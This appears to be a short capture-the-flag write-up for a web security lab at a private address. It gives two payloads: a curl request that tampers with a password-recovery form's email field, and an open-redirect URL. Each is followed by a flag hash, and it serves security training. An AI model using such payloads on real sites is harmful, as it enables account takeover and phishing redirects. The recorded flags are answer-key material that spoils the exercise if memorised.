Recover password vulnerabily:
On http://192.168.1.25/index.php?page=recover# there is a POST form,
we can change the input of mail and write our email,
If necessary we can change the max-value option
Payload: curl 'http://192.168.1.25/index.php?page=recover#' --data 'mail=lal@lala.fr.com&Submit=Submit'
Flag:
1d4855f7337c0c14b6f44946872c4eb33853f40b2d54393fbe94f49f1e19bbb0

Redirection vulnerabily:
We can specify on new location on the page http://192.168.1.25/index.php?page=redirect#
Playload: http://192.168.1.25/index.php?page=redirect&site=mywebsite
Flag:
b9e775a0291fed784a2d9680fcfad7edd6b8cdf87648da647aaf4bba288bcab3

e43ad1fdc54babe674da7c7b8f0127bde61de3fbe01def7d00f151c2fcca6d1c
